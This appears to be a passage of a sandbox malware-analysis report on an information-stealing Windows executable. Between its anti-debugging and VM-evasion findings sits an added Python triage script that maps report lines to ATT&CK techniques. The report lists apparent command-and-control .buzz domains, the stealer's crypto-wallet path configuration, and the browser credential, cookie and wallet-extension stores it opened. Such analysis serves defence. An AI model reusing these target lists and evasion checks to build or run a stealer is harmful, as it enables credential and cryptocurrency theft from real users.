              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: k7T6akLcAr.exe, 00000000.00000003.2214194315.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000002.2392016339.00000000009F7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055DA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696487552p
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: k7T6akLcAr.exe, 00000000.00000002.2392801868.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: k7T6akLcAr.exe, 00000000.00000003.2260773878.00000000055D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: k7T6akLcAr.exe | Binary or memory string: ZqeMU
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: NTICE
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: SICE
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: SIWVID
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Process queried: DebugPort
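              The evasion evidence above (RDTSC timing probes, self-modifying code, VM-artefact registry values such as SystemBiosVersion and the display-class DriverDesc, analysis-tool window classes, the SoftICE device names NTICE/SICE/SIWVID, ThreadHideFromDebugger and ProcessDebugPort queries, and the WMI AntiVirusProduct lookup) is more useful tallied than read line by line. The `\\.\Oreans.vxd` and `Software\WinLicense` strings in the memory dump belong to the Oreans Technologies protector runtime (Themida/WinLicense), which is a common origin of exactly this mix of window-class, SoftICE-device and RDTSC checks. The Python triage helper below is an added example, not part of the Joe Sandbox report or of the sample: it parses report lines of the shapes shown on this page (with or without the missing separator between the source path and the signature text), assigns each a category and an ATT&CK technique ID (the mapping is this example's own choice), and tallies the probed indicators. The sample lines are constructed from the shapes on this page.

```python
"""Classify Joe Sandbox behaviour lines into evasion and collection categories.

Added triage helper, not part of the report or of the sample. The line shapes
come from the report above; the category names and ATT&CK IDs are this
example's own mapping.
"""
import re
from collections import defaultdict

# The source path is often glued onto the signature text in the extracted
# report, so search for the signature instead of splitting on a delimiter.
SIG_RE = re.compile(
    r"(RDTSC instruction interceptor|Special instruction interceptor|"
    r"Open window title or class name|File opened|Thread information set|"
    r"Process queried|Registry key queried|Thread sleep time|WMI Queries): ?(.*)$")

ANALYSIS_TOOL_WINDOWS = {"regmonclass", "filemonclass", "procmon_window_class",
                         "ollydbg", "gbdyllo"}   # 'gbdyllo' is 'ollydbg' reversed
SOFTICE_DEVICES = {"NTICE", "SICE", "SIWVID"}    # legacy SoftICE driver device names
VM_REGISTRY_VALUES = {"SystemBiosVersion", "VideoBiosVersion", "DriverDesc"}
BROWSER_STORES = ("Web Data", "History", "logins.json", "cert9.db", "Local Extension Settings")


def classify(line):
    """Return (category, attack_id, indicator), or None for lines not modelled here."""
    m = SIG_RE.search(line)
    if not m:
        return None
    sig, detail = m.group(1), m.group(2).strip()
    if sig == "RDTSC instruction interceptor":
        n = len(re.findall(r"\brdtsc\b", detail))       # two per trace = one delta
        return ("timing-check", "T1497.003", f"{n} rdtsc in trace")
    if sig == "Thread sleep time":
        return ("timing-check", "T1497.003", detail.split(">=")[0].strip())
    if sig == "Special instruction interceptor":
        return ("self-modifying-code", "T1027", detail.split("caused by:")[-1].strip())
    if sig == "Open window title or class name":
        name = detail.lower()
        if name in ANALYSIS_TOOL_WINDOWS or "sysinternals" in name:
            return ("analysis-tool-window", "T1622", name)
    elif sig == "File opened":
        if detail in SOFTICE_DEVICES:
            return ("debugger-device", "T1622", detail)
        if any(s in detail for s in BROWSER_STORES):
            return ("browser-credential-store", "T1555.003", detail.rsplit("\\", 1)[-1])
    elif sig == "Thread information set" and "HideFromDebugger" in detail:
        return ("anti-debug", "T1622", "NtSetInformationThread(ThreadHideFromDebugger)")
    elif sig == "Process queried" and "DebugPort" in detail:
        return ("anti-debug", "T1622", "NtQueryInformationProcess(ProcessDebugPort)")
    elif sig == "Registry key queried":
        value = detail.rsplit("name:", 1)[-1].strip()
        if value in VM_REGISTRY_VALUES:
            return ("vm-artifact-check", "T1497.001", value)
    elif sig == "WMI Queries":
        wmi_class = detail.rsplit("FROM", 1)[-1].strip()
        if wmi_class == "AntiVirusProduct":
            return ("security-software-discovery", "T1518.001", wmi_class)
        if wmi_class in ("Win32_BIOS", "Win32_VideoController"):
            return ("vm-artifact-check", "T1497.001", wmi_class)
    return None


def summarize(lines):
    """Tally classified lines: {category: {"technique", "count", "indicators"}}."""
    out = defaultdict(lambda: {"technique": None, "count": 0, "indicators": set()})
    for line in lines:
        hit = classify(line)
        if hit:
            cat, tech, ind = hit
            out[cat]["technique"] = tech
            out[cat]["count"] += 1
            out[cat]["indicators"].add(ind)
    return {c: {"technique": v["technique"], "count": v["count"],
                "indicators": sorted(v["indicators"])} for c, v in out.items()}


SAMPLE_LINES = [  # constructed from the line shapes in the report above
    r"Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BD073A second address: 4BD073E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\k7T6akLcAr.exe TID: 3756Thread sleep time: -270000s >= -30000s",
    r"Source: C:\Users\user\Desktop\k7T6akLcAr.exeOpen window title or class name: ollydbg",
    r"Source: C:\Users\user\Desktop\k7T6akLcAr.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com",
    r"Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: SICE",
    r"Source: C:\Users\user\Desktop\k7T6akLcAr.exeThread information set: HideFromDebugger",
    r"Source: C:\Users\user\Desktop\k7T6akLcAr.exeProcess queried: DebugPort",
    r"Source: C:\Users\user\Desktop\k7T6akLcAr.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion",
    r"Source: C:\Users\user\Desktop\k7T6akLcAr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct",
    r"Source: C:\Users\user\Desktop\k7T6akLcAr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS",
    r"Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data",
    r"Source: C:\Users\user\Desktop\k7T6akLcAr.exeQueries volume information: C:\ VolumeInformation",
]

if __name__ == "__main__":
    for cat, info in summarize(SAMPLE_LINES).items():
        print(f"{cat:28} {info['technique']:10} x{info['count']}  {', '.join(info['indicators'])}")
```

Feeding the full behaviour section of a report through `summarize` gives a per-technique count that can go straight into a triage note; the indicator sets (which window classes, which registry values, which WMI classes) are what you compare against the next sample to see whether the same protector or stealer build is in play.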

              HIPS / PFW / Operating System Protection Evasion

              Source: k7T6akLcAr.exe | String found in binary or memory: hummskitnj.buzz
              Source: k7T6akLcAr.exe | String found in binary or memory: appliacnesot.buzz
              Source: k7T6akLcAr.exe | String found in binary or memory: cashfuzysao.buzz
              Source: k7T6akLcAr.exe | String found in binary or memory: inherineau.buzz
              Source: k7T6akLcAr.exe | String found in binary or memory: screwamusresz.buzz
              Source: k7T6akLcAr.exe | String found in binary or memory: rebuildeso.buzz
              Source: k7T6akLcAr.exe | String found in binary or memory: scentniej.buzz
              Source: k7T6akLcAr.exe | String found in binary or memory: mindhandru.buzz
              Source: k7T6akLcAr.exe | String found in binary or memory: prisonyfork.buzz
              Source: k7T6akLcAr.exe, 00000000.00000002.2393047105.0000000000FC0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: k7T6akLcAr.exe PID: 6032, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: k7T6akLcAr.exe | String found in binary or memory: "simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wal
              Source: k7T6akLcAr.exe | String found in binary or memory: ets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appd
              Source: k7T6akLcAr.exe | String found in binary or memory: "simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wal
              Source: k7T6akLcAr.exe | String found in binary or memory: "simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wal
              Source: k7T6akLcAr.exe | String found in binary or memory: :"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,
              Source: k7T6akLcAr.exe | String found in binary or memory: :"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,
              Source: k7T6akLcAr.exe | String found in binary or memory: :"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,
              Source: k7T6akLcAr.exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: k7T6akLcAr.exe | String found in binary or memory: :"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
